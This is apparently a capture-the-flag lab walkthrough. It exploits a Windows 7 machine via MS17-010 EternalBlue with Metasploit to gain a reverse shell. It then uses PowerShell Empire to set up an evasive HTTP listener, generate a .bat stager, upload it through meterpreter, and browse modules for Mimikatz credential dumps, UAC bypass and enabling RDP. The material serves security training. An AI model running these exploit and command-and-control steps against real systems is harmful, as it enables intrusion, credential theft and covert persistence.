Welcome! This writeup goes over how to use PS Empire to set up a listener and get the stager for the listener onto the target Windows server.
Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.
1) Deploy this machine and learn what exploitation this box is susceptible to!
Let’s scan the machine with nmap, specifying we want to scan for vulnerabilities. The vuln script shows the Windows server is susceptible to MS17-010.
$ nmap [machine_ip] -A -T4 --script vuln Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 20:51 PDT Pre-scan script results: |_broadcast-avahi-dos: ERROR: Script execution failed (use -d to debug) Nmap scan report for [machine_ip] Host is up (0.41s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 139/tcp open netbios-ssn Microsoft Windows netbios-ssn |_clamav-exec: ERROR: Script execution failed (use -d to debug) 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) |_clamav-exec: ERROR: Script execution failed (use -d to debug) 3389/tcp open ssl/ms-wbt-server? |_clamav-exec: ERROR: Script execution failed (use -d to debug) | rdp-vuln-ms12-020: | VULNERABLE: | MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2012-0152 | Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P) | Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service. | | Disclosure date: 2012-03-13 | References: | http://technet.microsoft.com/en-us/security/bulletin/ms12-020 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152 | | MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability | State: VULNERABLE | IDs: CVE:CVE-2012-0002 | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) | Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system. | | Disclosure date: 2012-03-13 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002 |_ http://technet.microsoft.com/en-us/security/bulletin/ms12-020 |_sslv2-drown: 49152/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49153/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49154/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49158/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) 49160/tcp open msrpc Microsoft Windows RPC |_clamav-exec: ERROR: Script execution failed (use -d to debug) Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED |_smb-vuln-ms10-054: false |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 130.55 seconds
2) Exploit the vulnerability to spawn a reverse shell!
We can start metasploit-framework and search for any exploits relative to MS17-010. Once the correct exploit is found, and the options are set (RHOSTS, LHOSTS, etc.), the exploit can be run.
$ msfconsole msf5 > search ms17-010 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution msf5 > use 2 msf5 exploit(windows/smb/ms17_010_eternalblue) > show options Module options (exploit/windows/smb/ms17_010_eternalblue): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Exploit target: Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts [machine_ip] rhosts => [machine_ip] msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit [*] Started reverse TCP handler on [host_ip]:4444 [*] [machine_ip]:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] [machine_ip]:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit) [*] [machine_ip]:445 - Scanned 1 of 1 hosts (100% complete) [*] [machine_ip]:445 - Connecting to target for exploitation. [+] [machine_ip]:445 - Connection established for exploitation. [+] [machine_ip]:445 - Target OS selected valid for OS indicated by SMB reply [*] [machine_ip]:445 - CORE raw buffer dump (42 bytes) [*] [machine_ip]:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] [machine_ip]:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] [machine_ip]:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] [machine_ip]:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] [machine_ip]:445 - Trying exploit with 12 Groom Allocations. [*] [machine_ip]:445 - Sending all but last fragment of exploit packet [*] [machine_ip]:445 - Starting non-paged pool grooming [+] [machine_ip]:445 - Sending SMBv2 buffers [+] [machine_ip]:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] [machine_ip]:445 - Sending final SMBv2 buffers. [*] [machine_ip]:445 - Sending last fragment of exploit packet! [*] [machine_ip]:445 - Receiving response from exploit packet [+] [machine_ip]:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] [machine_ip]:445 - Sending egg to corrupted connection. [*] [machine_ip]:445 - Triggering free of corrupted buffer. [*] Command shell session 1 opened ([host_ip]:4444 -> [machine_ip]:49187) at 2020-05-13 10:23:31 -0700 [+] [machine_ip]:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] [machine_ip]:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] [machine_ip]:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>
We now have a reverse shell into the Windows Server.
This task involves installing Powershell Empire onto the host Linux machine.
Just follow directions in the post, which is same instructions on Empire’s own website.
I had no issues installing, but some users report not able to get the database running, and Empire needs the database in order to start. I did have some errors while installing; what I did was run the /setup/reset.sh script and my install works with no issues.
1) Once empire has launched, type help to view the various menus. Which menu to we launch to access listeners?
2) Launch the listeners menu. In a manner similar to cobalt strike/metasploit, this will launch a contextual submenu. For the sake of this tutorial, we will be using an http listener in order to catch our connections. Type the command ‘uselistener http’ now. You can double-tap tab to view all options for listeners following typing ‘uselistener’
Answer: No answer needed.
3) What command can we now type to view all of the options related to our selected listener type?
4) Once the information regarding the listener pops up, peruse this for some of the more interesting options we can set in order to disguise our actions more. Which option can we use to set specific times when our listener will be active?
5) Similar to changing/spoofing what browser you are using on the internet, what option can we set to appear as a different user agent (i.e. chrome, firefox, etc)?
6) What option can we use to set the port which the listener will bind to?
7) In addition to changing our browser profile, we can change what our server appears as. What option can we set to change this?
**Empire has changed their menu options since the creation of the room, and I have verified with Tryhackme mods that the room needs to be updated.
**The relevant option in this menu that does what the question asks (but doesn’t accept as correct answer) is Headers. A user on the THM Discord server messaged me and revealed the accepted answer.
Answer: It accepts ServerVersion as correct answer.
8) Launch our newly created listener on port 80 with the command ‘execute’. What message is displayed following successfully launching the listener?
Answer: Listener successfully started!
9) We can verify that our listener is now active by typing what command?
1) First, type the command ‘usestager’ and double-tap tab to view all options we have for stagers. Which option allows us to use a batch file?
(Empire: listeners) > usestager multi/bash osx/jar windows/bunny windows/launcher_xml multi/launcher osx/launcher windows/csharp_exe windows/macro multi/macro osx/macho windows/dll windows/macroless_msword multi/pyinstaller osx/macro windows/ducky windows/shellcode multi/war osx/pkg windows/hta windows/teensy osx/applescript osx/safari_launcher windows/launcher_bat windows/wmic osx/application osx/shellcode windows/launcher_lnk osx/ducky osx/teensy windows/launcher_sct osx/dylib windows/backdoorLnkMacro windows/launcher_vbs
2) Let’s finish our previous command and select the batch file option. Press enter to finalize this. What is our new path to the ‘module’ we have selected?
3) Since we’ve previously set our listener to use http, we must now set the associated options within our stager we are building to match that. What option must we set in order to accomplish this?
(Empire: stager/windows/launcher_bat) > info Name: BAT Launcher Description: Generates a self-deleting .bat launcher for Empire. Options: Name Required Value Description ---- -------- ------- ----------- Listener True Listener to generate stager for. Language True powershell Language of the stager to generate. StagerRetries False 0 Times for the stager to retry connecting. OutFile False /tmp/launcher.bat File to output .bat launcher to, otherwise displayed on the screen. Delete False True Switch. Delete .bat after running. Obfuscate False False Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only. ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only. UserAgent False default User-agent string to use for the staging request (default, none, or other). Proxy False default Proxy to use for request (default, none, or other). ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
4) Type execute to finish creating our stager. Where is the stager saved?
(Empire: stager/windows/launcher_bat) > set Listener http1 (Empire: stager/windows/launcher_bat) > execute [*] Stager output written out to: /tmp/launcher.bat
5) Using any shell you have previously gained into our victim system transport the stager batch file to the system and execute it. This can be done in numerous ways depending on the stager used, be prepared to be flexible with your transportation methods similarly to how you might handle an msfvenom package.
Here, I tried a couple different methods. First I tried to run a python http server on the directory where the launcher.bat file is located, then use several different windows commands to download the file. None of these worked, the command/service would just freeze, or not actually save the file after it was downloaded.
The method that worked for me was to upgrade the reverse shell into a meterpreter shell, and use the upload command.
Go back to the msfconsole window and background the reverse shell we have with Crtl + Z. Then search for the post exploit “multi/manage/shell_to_meterpreter”. Set the SESSION option to the backgrounded reverse shell, and run the exploit. This should create a new session with a meterpreter shell.
More detailed instructions for upgrading to meterpreter shell is available here: https://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/
Once we have a meterpreter shell, we can use the upload command to transfer the launcher.bat file onto the Windows Server.
Note that the upload command has the syntax:
upload <source> <dest>
In this example, I first navigated to the top of the C:\ drive in meterpreter. So when I use the upload command, it will place ‘launcher.bat’ into C:\.
meterpreter > upload /tmp/launcher.bat launcher.bat [*] uploading : /tmp/launcher.bat -> launcher.bat [*] Uploaded 5.00 KiB of 5.00 KiB (100.0%): /tmp/launcher.bat -> launcher.bat [*] uploaded : /tmp/launcher.bat -> launcher.bat
Now we can go back to the regular shell and run launcher.bat.
1) First, type agents to view our registered agents.
Answer: No answer needed.
2) Once you’ve typed agents to list the registered agents, the agents submenu will become active. Use the help menu to answer the following questions.
Answer: No answer needed.
(Empire: agents) > help Commands ======== agents Jump to the agents menu. autorun Read and execute a list of Empire commands from a file and execute on each new agent "autorun <resource file> <agent language>" e.g. "autorun /root/ps.rc powershell". Or clear any autorun setting with "autorun clear" and show current autorun settings with "autorun show" back Go back to the main menu. clear Clear one or more agent's taskings. creds Display/return credentials from the database. exit Exit Empire. help Displays the help menu. interact Interact with a particular agent. kill Task one or more agents to exit. killdate Set the killdate for one or more agents (killdate [agent/all] 01/01/2016). list Lists all active agents (or listeners). listeners Jump to the listeners menu. lostlimit Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] ' main Go back to the main menu. remove Remove one or more agents from the database. rename Rename a particular agent. resource Read and execute a list of Empire commands from a file. searchmodule Search Empire module names/descriptions. sleep Task one or more agents to 'sleep [agent/all] interval [jitter]' uselistener Use an Empire listener module. usemodule Use an Empire PowerShell module. usestager Use an Empire stager. workinghours Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00).
3) What command do we use to interact with an agent?
4) What about if we wanted to list any usernames and passwords we have gathered?
5) And if we wanted to ‘deactivate’ an agent for a while to avoid detection?
6) How about if we wanted to delete an agent or disconnect it?
7) Moving into the post exploitation modules, what command can we use to search through these?
8) We’ll start with the most important module, find the module which plays a specific AC/DC song.
(Empire: agents) > searchmodule thunderstruck powershell/trollsploit/thunderstruck Play's a hidden version of AC/DC's Thunderstruck video while maxing out a computer's volume. python/trollsploit/osx/thunderstruck Open Safari in the background and play Thunderstruck.
9) What if we wanted to perform an lsa dump with a certain popular windows credential gathering tool?
10) Sometime we might not have the permissions level that we require to perform further actions, what module set might we have to use to get around UAC?
11) What module family allows us to gather additional information about the network we are on?
12) Our process we have compromised might not be the most stable, how do we migrate to another process? (This will have a specific module answer)
13) Last but not least, what module can we use to turn on remote desktop access for our purposes?
We’re done! We can really mess up a Windows System with this framework. I really enjoy the trollsploits – playing AC/DC, and there’s one that plays Rick Astley’s Never Gonna Give You Up!